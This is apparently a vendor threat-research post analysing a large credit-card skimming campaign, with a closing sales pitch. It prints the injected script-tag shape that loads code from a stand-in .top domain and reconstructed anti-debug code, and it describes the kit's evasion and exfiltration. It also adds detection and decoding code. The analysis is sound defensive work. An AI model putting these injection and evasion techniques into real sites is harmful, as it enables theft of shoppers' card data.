SecurityMetrics Uncovers a Near 700 Site Global Skimming Operation

SecurityMetrics forensic experts have identified a near 700 site skimming operation using a sophisticated, multi-channel kit designed to lock out analysts and mimic legitimate payment providers.

Credit card skimming is no longer just about a few lines of messy code. Skimming now resembles intricate, well-planned threat campaigns. 

Recently, the SecurityMetrics Forensic Analysis team identified a massive, synchronized campaign involving 693 credit card skimmers.

What SecurityMetrics Forensic Analysts found beneath the surface was a technically advanced skimmer kit designed to evade detection, impersonate legitimate payment forms, and exfiltrate stolen card data through multiple redundant channels. 

Because of our unique position in the industry, SecurityMetrics is currently the only entity with the data to link these disparate attacks to a single infrastructure fingerprint.

The Infrastructure Fingerprint

This campaign is defined by a highly deliberate infrastructure choice designed for rapid domain rotation and low cost per domain. All 693 malicious domains share a specific registration profile:

  • The TLD: Registered under the .top generic TLD.
  • The Registrar: NiceNIC International Group Co., Limited (IANA #3765), headquartered in Hong Kong.
  • The Mask: All domains resolve through Cloudflare nameservers, giving them the performance benefits and IP-masking properties of a legitimate CDN.

This combination of cheap .top domains, bulk registration through a single offshore registrar, and Cloudflare as a reverse proxy provides a veneer of legitimacy and makes automated blocklisting difficult. For security teams monitoring traffic, these are the registrar details associated with the threat:

REGISTRAR DETAILS

NiceNIC International Group Co., Limited • IANA #3765 • Hong Kong, China • abuse@nicenic.net

The Injection Method

The skimmer is injected via an external <script> tag, disguised as a site metrics library. The attackers use a site-specific path—the victim’s own domain name as a subdirectory—to give each target its own payload endpoint:

<script type="text/javascript"
  src="https://[maliciousdomain].top/[sitename]/metrics.js"
  id="custom-[timestamp]-js"></script>

The payload is a JavaScript file heavily obfuscated using a control-flow flattening technique with hex-encoded variable names and a rotating string array, making standard signature-based detection nearly impossible.
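
A page-source check for the injection shape described above, as an added example that is not SecurityMetrics' tooling: it flags external script tags whose host, path, filename or id matches the campaign's pattern (the .top domain, timestamp and merchant hostname in the sample are constructed).

```javascript
// Added example, not SecurityMetrics' tooling: flag <script> tags that match the
// injection signature above. It scans raw HTML with regexes so it runs in Node
// without a DOM; a production crawler should use a real HTML parser.
const SCRIPT_TAG = /<script\b([^>]*)>/gi;
const ATTR = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)')/g;

function parseAttrs(attrText) {
  const attrs = {};
  for (const m of attrText.matchAll(ATTR)) attrs[m[1].toLowerCase()] = m[2] ?? m[3];
  return attrs;
}

// siteHost: hostname of the page being scanned (the merchant's own domain).
// allowlist: third-party hosts expected to serve scripts, e.g. js.stripe.com.
function findSuspiciousScripts(html, siteHost, allowlist) {
  const findings = [];
  for (const m of html.matchAll(SCRIPT_TAG)) {
    const attrs = parseAttrs(m[1]);
    if (!attrs.src) continue;                      // inline scripts need a different check
    let url;
    try { url = new URL(attrs.src, `https://${siteHost}/`); } catch { continue; }
    if (url.hostname === siteHost || allowlist.includes(url.hostname)) continue;
    const reasons = [];
    if (url.hostname.endsWith('.top')) reasons.push('third-party .top domain');
    if (url.pathname.includes(`/${siteHost}/`)) reasons.push('victim hostname used as path segment');
    if (/\/metrics\.js$/i.test(url.pathname)) reasons.push('metrics.js filename');
    if (/^custom-\d+-js$/.test(attrs.id || '')) reasons.push('custom-<timestamp>-js id');
    if (reasons.length) findings.push({ src: attrs.src, id: attrs.id || null, reasons });
  }
  return findings;
}

// Constructed sample page: the third tag mimics the campaign's injection shape;
// the .top domain and the timestamp are made up for this example.
const SAMPLE_HTML = `
<script src="https://js.stripe.com/v3/"></script>
<script src="/assets/app.js"></script>
<script type="text/javascript"
  src="https://cdn-stat-example.top/shop.example/metrics.js"
  id="custom-1717171717-js"></script>`;

function scanSample() {
  return findSuspiciousScripts(SAMPLE_HTML, 'shop.example', ['js.stripe.com']);
}
```

Any single reason is worth a look; all four together is the fingerprint this campaign leaves in a merchant's page source.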

Technical Analysis: Advanced Evasion

Our forensic deep dive revealed several high-level functions that separate this kit from "run-of-the-mill" malware.

1. Anti-Analysis & DevTools Detection

The skimmer employs a debugger-timing trap to identify if a human analyst is watching. It records a performance.now() timestamp, triggers a debugger; statement, and measures the elapsed time.

If the elapsed time exceeds a threshold (indicating a human paused on the breakpoint in DevTools), the skimmer writes a kill flag to localStorage and terminates execution. On subsequent loads, it checks for this flag and silently exits, effectively "locking out" security researchers from seeing the malicious logic.

// Reconstructed anti-debug logic:
const t1 = performance.now();
debugger;
const t2 = performance.now();
if (t2 - t1 > 100) {
  localStorage.setItem('_debug_flag', '1');
  terminate();  // Skimmer shuts down permanently
}

This means that if a security analyst opens DevTools and steps through the code, the skimmer locks itself out for that browser profile, making casual analysis more difficult and reducing the likelihood of detection during manual review.

2. Form Interception

The kit uses regex-based input field identification to catch data even on non-standard forms, scanning for <input> elements whose placeholder or aria-label attributes match patterns like card, number, expir, mm/yy, cvv, cvc, or security.

3. Stripe Impersonation

To complete the deception, it loads card brand icons directly from Stripe’s CDN (js.stripe.com). By rendering Visa, Mastercard, and other card type icons alongside its own fields using configurable positioning properties (icon size, offset, vertical alignment), it creates a convincing visual match for Stripe-powered checkout forms.

4. DOM Surveillance via MutationObserver

The skimmer deploys multiple MutationObserver instances across the DOM to detect changes to the checkout page in real time.

This serves two purposes:

  • Re-injection: If the payment form is dynamically reloaded (common in AJAX-updated checkouts), the skimmer re-injects its logic.
  • Restore Logic: If a security tool attempts to remove the injected elements, the skimmer's "restore" logic immediately re-injects the overlay form HTML.

5. Multi-Channel Data Exfiltration

This is where the campaign gets particularly aggressive. It uses a three-tier exfiltration strategy with automatic failover to ensure stolen data reaches the C2 (Command and Control) server:

  1. Primary (WebSocket): The skimmer opens a persistent WebSocket connection to its C2 server. Stolen card data is base64-encoded (via btoa(unescape(encodeURIComponent(JSON.stringify(…))))) and sent over the socket in real time. If the WebSocket is open, data is dispatched immediately and a deduplication check prevents the same card from being exfiltrated twice.
  2. Fallback (navigator.sendBeacon): If the WebSocket is unavailable, the skimmer falls back to the Beacon API. It constructs the exfiltration URL dynamically from the WebSocket address (replacing wss:// with https://) and appends the base64 payload. The Beacon API is designed to survive page navigations, ensuring the data reaches the C2 even if the user clicks away during checkout.
  3. Last Resort (Image/Fetch): If all else fails, there are additional exfiltration paths available including traditional fetch requests and image pixel beacons. The configuration object includes flags for enableWebSocket, enableBeacon, and additional transport options (providing maximum resilience against network-level blocking).
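
A forensic decoder for the fallback channel described above, as an added example that is not SecurityMetrics' code: it derives the beacon URL from the C2 WebSocket address the way the kit does, reverses the base64/UTF-8 encoding and uses a Luhn check to confirm a real card number was exfiltrated. The exact position of the payload in the URL, the C2 host and the field names are assumptions for this example.

```javascript
// Added example, not SecurityMetrics' code: decode a captured fallback beacon so an
// IR analyst can confirm what was exfiltrated. Assumptions: the beacon URL is the
// C2 WebSocket endpoint with wss:// swapped for https:// and the base64 payload
// appended as a final path segment; field names in the payload are made up here.
function beaconUrlFromWebSocket(wsUrl) {
  return wsUrl.replace(/^wss:\/\//i, 'https://');
}

// Luhn check: tells a real PAN apart from other numeric strings in the payload.
function luhnValid(digits) {
  if (!/^\d{12,19}$/.test(digits)) return false;
  let sum = 0, dbl = false;
  for (let i = digits.length - 1; i >= 0; i--) {
    let d = Number(digits[i]);
    if (dbl && (d *= 2) > 9) d -= 9;
    sum += d; dbl = !dbl;
  }
  return sum % 10 === 0;
}

// Inverse of btoa(unescape(encodeURIComponent(JSON.stringify(obj)))): the base64
// wraps the UTF-8 bytes of the JSON text, so decode as UTF-8 and parse.
function decodeExfilPayload(b64) {
  return JSON.parse(Buffer.from(b64, 'base64').toString('utf8'));
}

function analyseCapturedBeacon(capturedUrl, c2WebSocketUrl) {
  const prefix = beaconUrlFromWebSocket(c2WebSocketUrl) + '/';
  if (!capturedUrl.startsWith(prefix)) return { decoded: false, reason: 'not this C2' };
  let obj;
  try { obj = decodeExfilPayload(decodeURIComponent(capturedUrl.slice(prefix.length))); }
  catch { return { decoded: false, reason: 'payload not base64 JSON' }; }
  const pan = Object.entries(obj).find(([, v]) => typeof v === 'string' && luhnValid(v.replace(/\D/g, '')));
  return { decoded: true, victimOrigin: obj.origin ?? null, hasValidPan: Boolean(pan),
           panKey: pan ? pan[0] : null, fields: Object.keys(obj) };
}

// Constructed sample: a standard test PAN, a made-up C2 host, and the encoding the
// campaign uses (Buffer base64 of UTF-8 JSON is equivalent to the btoa chain above).
const SAMPLE_WS = 'wss://c2-example.top/ws';
const SAMPLE_PAYLOAD = { number: '4111 1111 1111 1111', exp: '12/29', cvv: '123',
  ua: 'Mozilla/5.0 (constructed)', origin: 'https://shop.example' };
const SAMPLE_BEACON = beaconUrlFromWebSocket(SAMPLE_WS) + '/' +
  Buffer.from(JSON.stringify(SAMPLE_PAYLOAD), 'utf8').toString('base64');
```

The origin field is what lets the operator sort loot by merchant, so it is also the field that tells an analyst which site a captured beacon came from.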

6. Clipboard Hijacking

The skimmer also intercepts paste events on card number fields. When a user pastes a card number, the skimmer captures the clipboard data, strips non-numeric characters, and injects the sanitized number back into the field using document.execCommand('insertText'). This ensures the skimmer captures card numbers even when users paste them from password managers rather than typing them manually.

7. Data Payload Structure

The exfiltrated data object includes the card number, expiration date, CVV, the user’s browser user agent string, and the location.origin of the compromised site. This site-identification field allows the operator to sort stolen credentials by victim merchant, which is essential for a campaign operating across hundreds of targets simultaneously.

Why This Matters

This threat actor campaign isn't just stealing data; it's also identifying victims.

The exfiltrated data object includes the user's browser agent and the compromised site's origin, allowing the operator to sort stolen credentials by merchant.

In a landscape where attackers are using professional-grade infrastructure, you need forensic-grade protection. SecurityMetrics consistently monitors and discovers data trends, like this skimming operation, so SecurityMetrics customers can rest assured their data is protected. 

Talk to a SecurityMetrics forensic analyst expert today to protect your sensitive data. 
